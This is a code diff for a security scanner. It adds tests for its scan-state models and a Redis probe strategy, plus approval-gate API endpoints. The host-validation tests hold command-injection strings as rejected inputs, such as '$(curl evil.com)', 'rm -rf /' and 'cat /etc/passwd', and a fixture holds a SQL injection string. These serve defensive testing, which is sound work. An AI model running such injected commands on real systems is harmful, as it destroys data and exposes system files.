+++ b/packages/cli/tests/test_scanner/test_mutation_models.py
@@ -0,0 +1,386 @@
+"""Tests for mutation layer data models: KillChainState, IntelBundle, etc."""
+from __future__ import annotations
+
+import pytest
+
+from opentools.scanner.mutation.models import (
+    DiscoveredService,
+    DiscoveredVuln,
+    IntelBundle,
+    KillChainState,
+)
+
+
+# ---------------------------------------------------------------------------
+# DiscoveredService
+# ---------------------------------------------------------------------------
+
+
+class TestDiscoveredService:
+    def test_construction_required_fields(self):
+        svc = DiscoveredService(host="10.0.0.1", port=22, protocol="tcp", service="ssh")
+        assert svc.host == "10.0.0.1"
+        assert svc.port == 22
+        assert svc.protocol == "tcp"
+        assert svc.service == "ssh"
+
+    def test_optional_fields_default_none(self):
+        svc = DiscoveredService(host="10.0.0.1", port=80, protocol="tcp", service="http")
+        assert svc.product is None
+        assert svc.version is None
+        assert svc.banner is None
+
+    def test_optional_fields_populated(self):
+        svc = DiscoveredService(
+            host="10.0.0.1",
+            port=6379,
+            protocol="tcp",
+            service="redis",
+            product="Redis",
+            version="7.0.5",
+            banner="*1\r\n$7\r\nCOMMAND\r\n",
+        )
+        assert svc.product == "Redis"
+        assert svc.version == "7.0.5"
+        assert svc.banner == "*1\r\n$7\r\nCOMMAND\r\n"
+
+    def test_udp_protocol(self):
+        svc = DiscoveredService(host="10.0.0.1", port=53, protocol="udp", service="dns")
+        assert svc.protocol == "udp"
+
+    def test_round_trip_serialization(self):
+        """Pydantic v2 models are mutable by default; just verify round-trip works."""
+        svc = DiscoveredService(host="1.2.3.4", port=443, protocol="tcp", service="https")
+        data = svc.model_dump()
+        svc2 = DiscoveredService(**data)
+        assert svc == svc2
+
+
+# ---------------------------------------------------------------------------
+# DiscoveredVuln
+# ---------------------------------------------------------------------------
+
+
+class TestDiscoveredVuln:
+    def test_construction_required_fields(self):
+        vuln = DiscoveredVuln(
+            host="10.0.0.1",
+            port=6379,
+            template_id="redis-unauth",
+            severity="critical",
+            matched_at="redis://10.0.0.1:6379",
+        )
+        assert vuln.host == "10.0.0.1"
+        assert vuln.port == 6379
+        assert vuln.template_id == "redis-unauth"
+        assert vuln.severity == "critical"
+        assert vuln.matched_at == "redis://10.0.0.1:6379"
+
+    def test_port_optional_none(self):
+        vuln = DiscoveredVuln(
+            host="10.0.0.1",
+            port=None,
+            template_id="generic-header-check",
+            severity="info",
+            matched_at="http://10.0.0.1/",
+        )
+        assert vuln.port is None
+
+    def test_extracted_data_defaults_empty(self):
+        vuln = DiscoveredVuln(
+            host="10.0.0.1",
+            port=80,
+            template_id="xss-reflected",
+            severity="medium",
+            matched_at="http://10.0.0.1/search?q=test",
+        )
+        assert vuln.extracted_data == {}
+
+    def test_extracted_data_populated(self):
+        vuln = DiscoveredVuln(
+            host="10.0.0.1",
+            port=8080,
+            template_id="sqli-error-based",
+            severity="high",
+            matched_at="http://10.0.0.1/api/users",
+            extracted_data={"payload": "' OR '1'='1", "error": "syntax error"},
+        )
+        assert vuln.extracted_data["payload"] == "' OR '1'='1"
+
+    def test_round_trip(self):
+        vuln = DiscoveredVuln(
+            host="1.2.3.4",
+            port=443,
+            template_id="ssl-weak-cipher",
+            severity="low",
+            matched_at="https://1.2.3.4/",
+        )
+        assert DiscoveredVuln(**vuln.model_dump()) == vuln
+
+
+# ---------------------------------------------------------------------------
+# IntelBundle
+# ---------------------------------------------------------------------------
+
+
+class TestIntelBundle:
+    def test_empty_defaults(self):
+        bundle = IntelBundle()
+        assert bundle.services == []
+        assert bundle.vulns == []
+        assert bundle.urls == []
+        assert bundle.metadata == {}
+
+    def test_with_services(self):
+        svc = DiscoveredService(host="10.0.0.1", port=22, protocol="tcp", service="ssh")
+        bundle = IntelBundle(services=[svc])
+        assert len(bundle.services) == 1
+        assert bundle.services[0].service == "ssh"
+
+    def test_with_vulns(self):
+        vuln = DiscoveredVuln(
+            host="10.0.0.1",
+            port=80,
+            template_id="cve-2023-12345",
+            severity="high",
+            matched_at="http://10.0.0.1/vuln",
+        )
+        bundle = IntelBundle(vulns=[vuln])
+        assert len(bundle.vulns) == 1
+
+    def test_with_urls(self):
+        bundle = IntelBundle(urls=["http://10.0.0.1/admin", "http://10.0.0.1/api"])
+        assert len(bundle.urls) == 2
+
+    def test_with_metadata(self):
+        bundle = IntelBundle(metadata={"task_id": "nmap-001", "duration_s": 12.3})
+        assert bundle.metadata["task_id"] == "nmap-001"
+
+    def test_independent_default_factories(self):
+        """Each IntelBundle instance must get its own list objects."""
+        b1 = IntelBundle()
+        b2 = IntelBundle()
+        b1.services.append(
+            DiscoveredService(host="1.2.3.4", port=80, protocol="tcp", service="http")
+        )
+        assert b2.services == []
+
+
+# ---------------------------------------------------------------------------
+# KillChainState
+# ---------------------------------------------------------------------------
+
+
+class TestKillChainState:
+    def test_empty_defaults(self):
+        state = KillChainState()
+        assert state.services == {}
+        assert state.vulns == {}
+        assert state.urls == set()
+        assert state.tasks_spawned == {}
+        assert state.total_spawned == 0
+
+    def test_ingest_services(self):
+        state = KillChainState()
+        bundle = IntelBundle(
+            services=[
+                DiscoveredService(host="10.0.0.1", port=22, protocol="tcp", service="ssh"),
+                DiscoveredService(host="10.0.0.1", port=80, protocol="tcp", service="http"),
+            ]
+        )
+        state.ingest(bundle)
+        assert len(state.services) == 2
+        assert "10.0.0.1:22/tcp" in state.services
+        assert "10.0.0.1:80/tcp" in state.services
+
+    def test_ingest_deduplicates_services(self):
+        """Re-ingesting the same host:port/proto should overwrite, not duplicate."""
+        state = KillChainState()
+        svc_v1 = DiscoveredService(
+            host="10.0.0.1", port=6379, protocol="tcp", service="redis", version="6.0"
+        )
+        svc_v2 = DiscoveredService(
+            host="10.0.0.1", port=6379, protocol="tcp", service="redis", version="7.0"
+        )
+        state.ingest(IntelBundle(services=[svc_v1]))
+        state.ingest(IntelBundle(services=[svc_v2]))
+        assert len(state.services) == 1
+        assert state.services["10.0.0.1:6379/tcp"].version == "7.0"
+
+    def test_ingest_vulns(self):
+        state = KillChainState()
+        vuln = DiscoveredVuln(
+            host="10.0.0.1",
+            port=80,
+            template_id="xss-reflected",
+            severity="medium",
+            matched_at="http://10.0.0.1/",
+        )
+        state.ingest(IntelBundle(vulns=[vuln]))
+        assert "10.0.0.1:80:xss-reflected" in state.vulns
+
+    def test_ingest_deduplicates_vulns(self):
+        state = KillChainState()
+        vuln1 = DiscoveredVuln(
+            host="10.0.0.1",
+            port=80,
+            template_id="sqli",
+            severity="high",
+            matched_at="http://10.0.0.1/a",
+        )
+        vuln2 = DiscoveredVuln(
+            host="10.0.0.1",
+            port=80,
+            template_id="sqli",
+            severity="high",
+            matched_at="http://10.0.0.1/b",  # same template_id, updated matched_at
+        )
+        state.ingest(IntelBundle(vulns=[vuln1]))
+        state.ingest(IntelBundle(vulns=[vuln2]))
+        assert len(state.vulns) == 1
+        assert state.vulns["10.0.0.1:80:sqli"].matched_at == "http://10.0.0.1/b"
+
+    def test_ingest_vulns_multi_port_no_collision(self):
+        """Same template on different ports must produce distinct entries, not overwrite."""
+        state = KillChainState()
+        vuln_80 = DiscoveredVuln(
+            host="10.0.0.1",
+            port=80,
+            template_id="http-open-redirect",
+            severity="medium",
+            matched_at="http://10.0.0.1/",
+        )
+        vuln_8080 = DiscoveredVuln(
+            host="10.0.0.1",
+            port=8080,
+            template_id="http-open-redirect",
+            severity="medium",
+            matched_at="http://10.0.0.1:8080/",
+        )
+        state.ingest(IntelBundle(vulns=[vuln_80, vuln_8080]))
+        assert len(state.vulns) == 2
+        assert "10.0.0.1:80:http-open-redirect" in state.vulns
+        assert "10.0.0.1:8080:http-open-redirect" in state.vulns
+
+    def test_ingest_vuln_no_port_key(self):
+        """Vulns with port=None must use 'noport' in the key and not collide with port-bearing vulns."""
+        state = KillChainState()
+        vuln_no_port = DiscoveredVuln(
+            host="10.0.0.1",
+            port=None,
+            template_id="generic-check",
+            severity="info",
+            matched_at="http://10.0.0.1/",
+        )
+        vuln_with_port = DiscoveredVuln(
+            host="10.0.0.1",
+            port=80,
+            template_id="generic-check",
+            severity="info",
+            matched_at="http://10.0.0.1/",
+        )
+        state.ingest(IntelBundle(vulns=[vuln_no_port, vuln_with_port]))
+        assert len(state.vulns) == 2
+        assert "10.0.0.1:noport:generic-check" in state.vulns
+        assert "10.0.0.1:80:generic-check" in state.vulns
+
+    def test_ingest_urls(self):
+        state = KillChainState()
+        state.ingest(IntelBundle(urls=["http://10.0.0.1/admin", "http://10.0.0.1/login"]))
+        assert "http://10.0.0.1/admin" in state.urls
+        assert "http://10.0.0.1/login" in state.urls
+
+    def test_ingest_urls_deduplicates(self):
+        state = KillChainState()
+        state.ingest(IntelBundle(urls=["http://10.0.0.1/admin"]))
+        state.ingest(IntelBundle(urls=["http://10.0.0.1/admin", "http://10.0.0.1/api"]))
+        assert len(state.urls) == 2
+
+    def test_has_service_true(self):
+        state = KillChainState()
+        state.ingest(
+            IntelBundle(
+                services=[DiscoveredService(host="10.0.0.1", port=6379, protocol="tcp", service="redis")]
+            )
+        )
+        assert state.has_service("redis") is True
+
+    def test_has_service_false(self):
+        state = KillChainState()
+        state.ingest(
+            IntelBundle(
+                services=[DiscoveredService(host="10.0.0.1", port=22, protocol="tcp", service="ssh")]
+            )
+        )
+        assert state.has_service("redis") is False
+
+    def test_has_service_empty_state(self):
+        state = KillChainState()
+        assert state.has_service("ssh") is False
+
+    def test_get_services_returns_matching(self):
+        state = KillChainState()
+        bundle = IntelBundle(
+            services=[
+                DiscoveredService(host="10.0.0.1", port=6379, protocol="tcp", service="redis"),
+                DiscoveredService(host="10.0.0.2", port=6380, protocol="tcp", service="redis"),
+                DiscoveredService(host="10.0.0.3", port=22, protocol="tcp", service="ssh"),
+            ]
+        )
+        state.ingest(bundle)
+        redis_svcs = state.get_services("redis")
+        assert len(redis_svcs) == 2
+        assert all(s.service == "redis" for s in redis_svcs)
+
+    def test_get_services_returns_empty_when_none(self):
+        state = KillChainState()
+        state.ingest(
+            IntelBundle(
+                services=[DiscoveredService(host="10.0.0.1", port=22, protocol="tcp", service="ssh")]
+            )
+        )
+        assert state.get_services("redis") == []
+
+    def test_record_spawn_single(self):
+        state = KillChainState()
+        state.record_spawn("nmap-service-scan")
+        assert state.tasks_spawned["nmap-service-scan"] == 1
+        assert state.total_spawned == 1
+
+    def test_record_spawn_accumulates(self):
+        state = KillChainState()
+        state.record_spawn("nuclei-scan", count=3)
+        state.record_spawn("nuclei-scan", count=2)
+        assert state.tasks_spawned["nuclei-scan"] == 5
+        assert state.total_spawned == 5
+
+    def test_record_spawn_multiple_strategies(self):
+        state = KillChainState()
+        state.record_spawn("nmap-scan", count=1)
+        state.record_spawn("nuclei-scan", count=4)
+        state.record_spawn("nmap-scan", count=2)
+        assert state.tasks_spawned["nmap-scan"] == 3
+        assert state.tasks_spawned["nuclei-scan"] == 4
+        assert state.total_spawned == 7
+
+    def test_ingest_combined_bundle(self):
+        """Ingest a bundle with services, vulns, and URLs all at once."""
+        state = KillChainState()
+        bundle = IntelBundle(
+            services=[DiscoveredService(host="10.0.0.1", port=80, protocol="tcp", service="http")],
+            vulns=[
+                DiscoveredVuln(
+                    host="10.0.0.1",
+                    port=80,
+                    template_id="http-title",
+                    severity="info",
+                    matched_at="http://10.0.0.1/",
+                )
+            ],
+            urls=["http://10.0.0.1/admin"],
+            metadata={"scanner": "nuclei"},
+        )
+        state.ingest(bundle)
+        assert len(state.services) == 1
+        assert len(state.vulns) == 1
+        assert len(state.urls) == 1
diff --git a/packages/cli/tests/test_scanner/test_mutation_strategy.py b/packages/cli/tests/test_scanner/test_mutation_strategy.py
new file mode 100644
index 0000000..8a42f34
--- /dev/null
+++ b/packages/cli/tests/test_scanner/test_mutation_strategy.py
@@ -0,0 +1,418 @@
+"""Tests for MutationStrategy protocol and RedisProbeStrategy."""
+from __future__ import annotations
+
+import pytest
+
+from opentools.scanner.mutation.models import DiscoveredService, IntelBundle, KillChainState
+from opentools.scanner.mutation.strategy import (
+    MutationStrategy,
+    RedisProbeStrategy,
+    _validate_host,
+    get_builtin_strategies,
+)
+from opentools.scanner.models import ExecutionTier, ScanTask, TaskType
+
+
+# ---------------------------------------------------------------------------
+# Helpers
+# ---------------------------------------------------------------------------
+
+
+def _make_task(
+    task_id: str = "task-001",
+    scan_id: str = "scan-abc",
+    tool: str = "nmap",
+) -> ScanTask:
+    """Create a minimal ScanTask for use as a completed_task in tests."""
+    return ScanTask(
+        id=task_id,
+        scan_id=scan_id,
+        name=f"{tool} task",
+        tool=tool,
+        task_type=TaskType.SHELL,
+    )
+
+
+def _make_state_with_redis(
+    host: str = "10.0.0.1",
+    port: int = 6379,
+    extra_services: list[DiscoveredService] | None = None,
+) -> KillChainState:
+    """Build a KillChainState that contains a Redis service."""
+    services = [
+        DiscoveredService(host=host, port=port, protocol="tcp", service="redis")
+    ]
+    if extra_services:
+        services.extend(extra_services)
+    state = KillChainState()
+    state.ingest(IntelBundle(services=services))
+    return state
+
+
+def _make_empty_state() -> KillChainState:
+    return KillChainState()
+
+
+# ---------------------------------------------------------------------------
+# TestRedisProbeStrategy — attributes
+# ---------------------------------------------------------------------------
+
+
+class TestRedisProbeStrategyAttributes:
+    def setup_method(self):
+        self.strategy = RedisProbeStrategy()
+
+    def test_name(self):
+        assert self.strategy.name == "redis_probe"
+
+    def test_max_spawns(self):
+        assert self.strategy.max_spawns == 10
+
+    def test_satisfies_protocol(self):
+        assert isinstance(self.strategy, MutationStrategy)
+
+
+# ---------------------------------------------------------------------------
+# TestRedisProbeStrategy — spawning behaviour
+# ---------------------------------------------------------------------------
+
+
+class TestRedisProbeStrategy:
+    def setup_method(self):
+        self.strategy = RedisProbeStrategy()
+        self.scan_id = "scan-xyz"
+
+    # --- happy path ----------------------------------------------------------
+
+    def test_spawns_redis_probe_when_redis_discovered(self):
+        state = _make_state_with_redis(host="10.0.0.1", port=6379)
+        completed = _make_task(task_id="nmap-001", scan_id=self.scan_id, tool="nmap")
+
+        tasks = self.strategy.evaluate(state, self.scan_id, completed)
+
+        assert len(tasks) == 1
+        task = tasks[0]
+        assert task.tool == "redis-cli"
+        assert task.task_type == TaskType.DOCKER_EXEC
+        assert "10.0.0.1" in task.command
+        assert "6379" in task.command
+        assert task.scan_id == self.scan_id
+        assert task.spawned_by == "nmap-001"
+
+    def test_spawned_task_command_format(self):
+        state = _make_state_with_redis(host="192.168.1.50", port=6380)
+        completed = _make_task(tool="nmap")
+
+        tasks = self.strategy.evaluate(state, self.scan_id, completed)
+
+        assert len(tasks) == 1
+        assert tasks[0].command == "redis-cli -h 192.168.1.50 -p 6380 INFO"
+
+    def test_spawned_task_priority_and_tier(self):
+        state = _make_state_with_redis()
+        completed = _make_task(tool="nmap")
+
+        tasks = self.strategy.evaluate(state, self.scan_id, completed)
+
+        task = tasks[0]
+        assert task.priority == 20
+        assert task.tier == ExecutionTier.FAST
+
+    def test_spawned_task_depends_on_completed(self):
+        state = _make_state_with_redis()
+        completed = _make_task(task_id="nmap-scan-001", tool="nmap")
+
+        tasks = self.strategy.evaluate(state, self.scan_id, completed)
+
+        assert "nmap-scan-001" in tasks[0].depends_on
+
+    def test_spawned_reason_mentions_host_and_port(self):
+        state = _make_state_with_redis(host="10.10.10.10", port=6379)
+        completed = _make_task(tool="nmap")
+
+        tasks = self.strategy.evaluate(state, self.scan_id, completed)
+
+        assert "10.10.10.10" in tasks[0].spawned_reason
+        assert "6379" in tasks[0].spawned_reason
+
+    # --- no Redis discovered -------------------------------------------------
+
+    def test_no_spawn_when_no_redis(self):
+        state = _make_empty_state()
+        state.ingest(
+            IntelBundle(
+                services=[
+                    DiscoveredService(host="10.0.0.1", port=22, protocol="tcp", service="ssh")
+                ]
+            )
+        )
+        completed = _make_task(tool="nmap")
+
+        tasks = self.strategy.evaluate(state, self.scan_id, completed)
+
+        assert tasks == []
+
+    def test_no_spawn_when_state_empty(self):
+        state = _make_empty_state()
+        completed = _make_task(tool="nmap")
+
+        tasks = self.strategy.evaluate(state, self.scan_id, completed)
+
+        assert tasks == []
+
+    # --- idempotency ---------------------------------------------------------
+
+    def test_no_spawn_when_already_spawned(self):
+        """Second evaluate() call for the same Redis service returns empty list."""
+        state = _make_state_with_redis()
+        completed = _make_task(tool="nmap")
+
+        first = self.strategy.evaluate(state, self.scan_id, completed)
+        second = self.strategy.evaluate(state, self.scan_id, completed)
+
+        assert len(first) == 1
+        assert second == []
+
+    def test_idempotent_across_different_completed_tasks(self):
+        """Even with a different completed_task, already-tracked keys are skipped."""
+        state = _make_state_with_redis()
+        completed1 = _make_task(task_id="nmap-001", tool="nmap")
+        completed2 = _make_task(task_id="nmap-002", tool="nmap")
+
+        first = self.strategy.evaluate(state, self.scan_id, completed1)
+        second = self.strategy.evaluate(state, self.scan_id, completed2)
+
+        assert len(first) == 1
+        assert second == []
+
+    # --- multiple instances --------------------------------------------------
+
+    def test_spawns_for_multiple_redis_instances(self):
+        """Each distinct Redis service gets its own probe task."""
+        state = KillChainState()
+        state.ingest(
+            IntelBundle(
+                services=[
+                    DiscoveredService(host="10.0.0.1", port=6379, protocol="tcp", service="redis"),
+                    DiscoveredService(host="10.0.0.2", port=6379, protocol="tcp", service="redis"),
+                    DiscoveredService(host="10.0.0.3", port=6380, protocol="tcp", service="redis"),
+                ]
+            )
+        )
+        completed = _make_task(tool="nmap")
+
+        tasks = self.strategy.evaluate(state, self.scan_id, completed)
+
+        assert len(tasks) == 3
+        hosts = {t.id for t in tasks}
+        assert "redis-probe-10.0.0.1-6379" in hosts
+        assert "redis-probe-10.0.0.2-6379" in hosts
+        assert "redis-probe-10.0.0.3-6380" in hosts
+
+    # --- trigger tool filtering ----------------------------------------------
+
+    def test_ignores_non_nmap_tool(self):
+        state = _make_state_with_redis()
+        completed = _make_task(tool="nuclei")
+
+        tasks = self.strategy.evaluate(state, self.scan_id, completed)
+
+        assert tasks == []
+
+    def test_fires_for_masscan_tool(self):
+        state = _make_state_with_redis()
+        completed = _make_task(tool="masscan")
+
+        tasks = self.strategy.evaluate(state, self.scan_id, completed)
+
+        assert len(tasks) == 1
+
+    def test_ignores_redis_cli_tool(self):
+        """A redis-cli task completing should not trigger another probe."""
+        state = _make_state_with_redis()
+        completed = _make_task(tool="redis-cli")
+
+        tasks = self.strategy.evaluate(state, self.scan_id, completed)
+
+        assert tasks == []
+
+    def test_ignores_shell_tool(self):
+        state = _make_state_with_redis()
+        completed = _make_task(tool="curl")
+
+        tasks = self.strategy.evaluate(state, self.scan_id, completed)
+
+        assert tasks == []
+
+    # --- deterministic IDs ---------------------------------------------------
+
+    def test_task_ids_are_deterministic(self):
+        """Two fresh strategy instances produce identical task IDs for the same input."""
+        state = _make_state_with_redis(host="10.0.0.5", port=6379)
+        completed = _make_task(tool="nmap")
+
+        strategy_a = RedisProbeStrategy()
+        strategy_b = RedisProbeStrategy()
+
+        tasks_a = strategy_a.evaluate(state, self.scan_id, completed)
+        tasks_b = strategy_b.evaluate(state, self.scan_id, completed)
+
+        assert len(tasks_a) == 1
+        assert len(tasks_b) == 1
+        assert tasks_a[0].id == tasks_b[0].id
+
+    def test_task_id_format(self):
+        state = _make_state_with_redis(host="172.16.0.1", port=6379)
+        completed = _make_task(tool="nmap")
+
+        tasks = self.strategy.evaluate(state, self.scan_id, completed)
+
+        assert tasks[0].id == "redis-probe-172.16.0.1-6379"
+
+    def test_task_id_includes_port(self):
+        """Non-default port must be reflected in the task ID."""
+        state = _make_state_with_redis(host="10.0.0.1", port=6380)
+        completed = _make_task(tool="nmap")
+
+        tasks = self.strategy.evaluate(state, self.scan_id, completed)
+
+        assert tasks[0].id == "redis-probe-10.0.0.1-6380"
+
+    # --- mixed services ------------------------------------------------------
+
+    def test_only_redis_services_spawn_probes(self):
+        """SSH and HTTP alongside Redis should not produce extra probe tasks."""
+        state = KillChainState()
+        state.ingest(
+            IntelBundle(
+                services=[
+                    DiscoveredService(host="10.0.0.1", port=22, protocol="tcp", service="ssh"),
+                    DiscoveredService(host="10.0.0.1", port=80, protocol="tcp", service="http"),
+                    DiscoveredService(host="10.0.0.1", port=6379, protocol="tcp", service="redis"),
+                ]
+            )
+        )
+        completed = _make_task(tool="nmap")
+
+        tasks = self.strategy.evaluate(state, self.scan_id, completed)
+
+        assert len(tasks) == 1
+        assert tasks[0].tool == "redis-cli"
+
+
+# ---------------------------------------------------------------------------
+# TestGetBuiltinStrategies
+# ---------------------------------------------------------------------------
+
+
+class TestGetBuiltinStrategies:
+    def test_returns_list(self):
+        result = get_builtin_strategies()
+        assert isinstance(result, list)
+
+    def test_contains_redis_probe(self):
+        result = get_builtin_strategies()
+        names = [s.name for s in result]
+        assert "redis_probe" in names
+
+    def test_all_satisfy_protocol(self):
+        result = get_builtin_strategies()
+        assert len(result) > 0
+        for strategy in result:
+            assert isinstance(strategy, MutationStrategy), (
+                f"{strategy!r} does not satisfy MutationStrategy protocol"
+            )
+
+    def test_returns_fresh_instances_each_call(self):
+        """Each call returns new instances so state doesn't leak between calls."""
+        strategies_a = get_builtin_strategies()
+        strategies_b = get_builtin_strategies()
+        # Same number, but different objects
+        assert len(strategies_a) == len(strategies_b)
+        for a, b in zip(strategies_a, strategies_b):
+            assert a is not b
+
+
+# ---------------------------------------------------------------------------
+# TestValidateHost — command injection guard
+# ---------------------------------------------------------------------------
+
+
+class TestValidateHost:
+    """Ensure _validate_host rejects shell metacharacters."""
+
+    @pytest.mark.parametrize(
+        "host",
+        [
+            "10.0.0.1",
+            "example.com",
+            "my-host.internal",
+            "192.168.1.1",
+            "[::1]",
+            "fe80::1",
+        ],
+    )
+    def test_safe_hosts_accepted(self, host: str):
+        assert _validate_host(host) is True
+
+    @pytest.mark.parametrize(
+        "host",
+        [
+            "10.0.0.1; rm -rf /",
+            "$(curl evil.com)",
+            "`whoami`",
+            "host | cat /etc/passwd",
+            "10.0.0.1 && echo pwned",
+            "host\nnewline",
+            "",
+        ],
+    )
+    def test_unsafe_hosts_rejected(self, host: str):
+        assert _validate_host(host) is False
+
+    def test_overlong_host_rejected(self):
+        long_host = "a" * 254
+        assert _validate_host(long_host) is False
+
+    def test_max_length_host_accepted(self):
+        max_host = "a" * 253
+        assert _validate_host(max_host) is True
+
+
+class TestRedisProbeCommandInjection:
+    """RedisProbeStrategy must skip services with unsafe hostnames."""
+
+    def setup_method(self):
+        self.strategy = RedisProbeStrategy()
+        self.scan_id = "scan-inject"
+
+    def test_malicious_host_skipped(self):
+        """A Redis service with shell metacharacters in the host is silently skipped."""
+        state = KillChainState()
+        state.ingest(
+            IntelBundle(
+                services=[
+                    DiscoveredService(
+                        host="10.0.0.1; rm -rf /",
+                        port=6379,
+                        protocol="tcp",
+                        service="redis",
+                    ),
+                ]
+            )
+        )
+        completed = _make_task(tool="nmap")
+
+        tasks = self.strategy.evaluate(state, self.scan_id, completed)
+
+        assert tasks == []
+
+    def test_safe_host_still_spawns(self):
+        """Normal hosts continue to produce probe tasks after the guard is added."""
+        state = _make_state_with_redis(host="10.0.0.1", port=6379)
+        completed = _make_task(tool="nmap")
+
+        tasks = self.strategy.evaluate(state, self.scan_id, completed)
+
+        assert len(tasks) == 1
+        assert "10.0.0.1" in tasks[0].command
diff --git a/packages/cli/tests/test_scanner/test_shared_subprocess.py b/packages/cli/tests/test_scanner/test_shared_subprocess.py
index c2cc89d..4b232ab 100644
--- a/packages/cli/tests/test_scanner/test_shared_subprocess.py
+++ b/packages/cli/tests/test_scanner/test_shared_subprocess.py
@@ -112,3 +112,29 @@ async def test_stderr_capture(self):
         )
         assert "error_output" in result.stderr
         assert result.exit_code == 0
+
+
+class TestRunStreamingEnv:
+    """Tests for environment variable passing to subprocess."""
+
+    @pytest.mark.asyncio
+    async def test_env_vars_passed_to_subprocess(self):
+        """Custom env dict is forwarded to the subprocess."""
+        result = await run_streaming(
+            [sys.executable, "-c", "import os; print(os.environ.get('OT_TEST_PROXY', 'NOT_SET'))"],
+            on_output=lambda _: None,
+            env={"OT_TEST_PROXY": "socks5://127.0.0.1:1080"},
+        )
+        assert "socks5://127.0.0.1:1080" in result.stdout
+        assert result.exit_code == 0
+
+    @pytest.mark.asyncio
+    async def test_env_none_inherits_parent(self):
+        """env=None (default) inherits parent process environment."""
+        result = await run_streaming(
+            [sys.executable, "-c", "import os; print(os.environ.get('PATH', 'NOT_SET'))"],
+            on_output=lambda _: None,
+            env=None,
+        )
+        assert "NOT_SET" not in result.stdout
+        assert result.exit_code == 0
diff --git a/packages/web/backend/app/models.py b/packages/web/backend/app/models.py
index ec4c027..b50db76 100644
--- a/packages/web/backend/app/models.py
+++ b/packages/web/backend/app/models.py
@@ -280,6 +280,9 @@ class ScanTaskRecord(SQLModel, table=True):
     isolation: str = Field(default="none")
     spawned_by: Optional[str] = None
     spawned_reason: Optional[str] = None
+    # Approval gate fields
+    approval_ticket_id: Optional[str] = None
+    approval_expires_at: Optional[datetime] = Field(default=None, **_TZ_KW)
     started_at: Optional[datetime] = Field(default=None, **_TZ_KW)
     completed_at: Optional[datetime] = Field(default=None, **_TZ_KW)
 
diff --git a/packages/web/backend/app/routes/scans.py b/packages/web/backend/app/routes/scans.py
index 004d6ea..9b41793 100644
--- a/packages/web/backend/app/routes/scans.py
+++ b/packages/web/backend/app/routes/scans.py
@@ -380,6 +380,114 @@ async def cancel_scan(
     )
 
 
+# ---------------------------------------------------------------------------
+# Approval gate endpoints
+# ---------------------------------------------------------------------------
+
+
+class GateResponse(BaseModel):
+    ticket_id: str
+    task_id: str
+    tool: str
+    command: str | None = None
+    description: str
+    status: str
+    expires_at: str | None = None
+
+class GateDecisionResponse(BaseModel):
+    ticket_id: str
+    decision: str
+
+class GateRejectRequest(BaseModel):
+    reason: str = "operator rejected"
+
+
+@router.get("/{scan_id}/gates")
+async def list_pending_gates(
+    scan_id: str,
+    session: AsyncSession = Depends(get_db),
+    user: User = Depends(get_current_user),
+):
+    """List tasks awaiting operator approval."""
+    svc = ScanService(session, user)
+    scan = await svc.get_scan(scan_id)
+    if scan is None:
+        raise HTTPException(status_code=404, detail="Scan not found")
+    tasks = await svc.get_scan_tasks(scan_id)
+    gates = []
+    for t in tasks:
+        if t.status == "awaiting_approval" and t.approval_ticket_id:
+            gates.append(GateResponse(
+                ticket_id=t.approval_ticket_id,
+                task_id=t.id, tool=t.tool, command=t.command,
+                description="",
+                status=t.status,
+                expires_at=t.approval_expires_at.isoformat() if t.approval_expires_at else None,
+            ))
+    return {"scan_id": scan_id, "gates": gates}
+
+
+@router.post("/{scan_id}/gates/{ticket_id}/approve")
+async def approve_gate(
+    scan_id: str, ticket_id: str,
+    session: AsyncSession = Depends(get_db),
+    user: User = Depends(get_current_user),
+):
+    """Approve a pending gate. Write-before-signal."""
+    svc = ScanService(session, user)
+    scan = await svc.get_scan(scan_id)
+    if scan is None:
+        raise HTTPException(status_code=404, detail="Scan not found")
+    task_record = await svc.get_task_by_ticket(scan_id, ticket_id)
+    if task_record is None:
+        raise HTTPException(status_code=404, detail="Gate ticket not found")
+    if task_record.status != "awaiting_approval":
+        raise HTTPException(status_code=409, detail=f"Gate already resolved: {task_record.status}")
+
+    # 1. PERSIST FIRST (source of truth)
+    await svc.update_task_approval_status(task_record.id, "approved")
+    await session.commit()
+
+    # 2. Signal event (best-effort tripwire)
+    from opentools.scanner.api import _active_scans
+    entry = _active_scans.get(scan_id, {})
+    registry = entry.get("approval_registry")
+    if registry is not None:
+        registry.signal(ticket_id)
+
+    return GateDecisionResponse(ticket_id=ticket_id, decision="approved")
+
+
+@router.post("/{scan_id}/gates/{ticket_id}/reject")
+async def reject_gate(
+    scan_id: str, ticket_id: str,
+    body: GateRejectRequest = GateRejectRequest(),
+    session: AsyncSession = Depends(get_db),
+    user: User = Depends(get_current_user),
+):
+    """Reject a pending gate. Write-before-signal."""
+    svc = ScanService(session, user)
+    scan = await svc.get_scan(scan_id)
+    if scan is None:
+        raise HTTPException(status_code=404, detail="Scan not found")
+    task_record = await svc.get_task_by_ticket(scan_id, ticket_id)
+    if task_record is None:
+        raise HTTPException(status_code=404, detail="Gate ticket not found")
+    if task_record.status != "awaiting_approval":
+        raise HTTPException(status_code=409, detail=f"Gate already resolved: {task_record.status}")
+
+    await svc.update_task_approval_status(task_record.id, "rejected")
+    await session.commit()
+
+    from opentools.scanner.api import _active_scans
+    entry = _active_scans.get(scan_id, {})
+    registry = entry.get("approval_registry")
+    if registry is not None:
+        registry.signal(ticket_id)
+
+    return GateDecisionResponse(ticket_id=ticket_id, decision="rejected")
+
+
 # ---------------------------------------------------------------------------
 # SSE streaming
 # ---------------------------------------------------------------------------
diff --git a/packages/web/backend/app/services/scan_service.py b/packages/web/backend/app/services/scan_service.py
index b3685c3..ce9fecd 100644
--- a/packages/web/backend/app/services/scan_service.py
+++ b/packages/web/backend/app/services/scan_service.py
@@ -163,6 +163,27 @@ async def persist_tasks(self, tasks: list[ScanTaskRecord]) -> None:
             self.session.add(t)
         await self.session.commit()
 
+    async def get_task_by_ticket(self, scan_id: str, ticket_id: str) -> ScanTaskRecord | None:
+        """Find a task by its approval ticket ID within a scan."""
+        from sqlalchemy import select
+        stmt = (
+            select(ScanTaskRecord)
+            .where(ScanTaskRecord.scan_id == scan_id)
+            .where(ScanTaskRecord.approval_ticket_id == ticket_id)
+        )
+        result = await self.session.execute(stmt)
+        return result.scalar_one_or_none()
+
+    async def update_task_approval_status(self, task_id: str, status: str) -> None:
+        """Update a task's status for gate approval/rejection."""
+        from sqlalchemy import update
+        stmt = (
+            update(ScanTaskRecord)
+            .where(ScanTaskRecord.id == task_id)
+            .values(status=status)
+        )
+        await self.session.execute(stmt)
+
     # ------------------------------------------------------------------
     # Helpers
     # ------------------------------------------------------------------
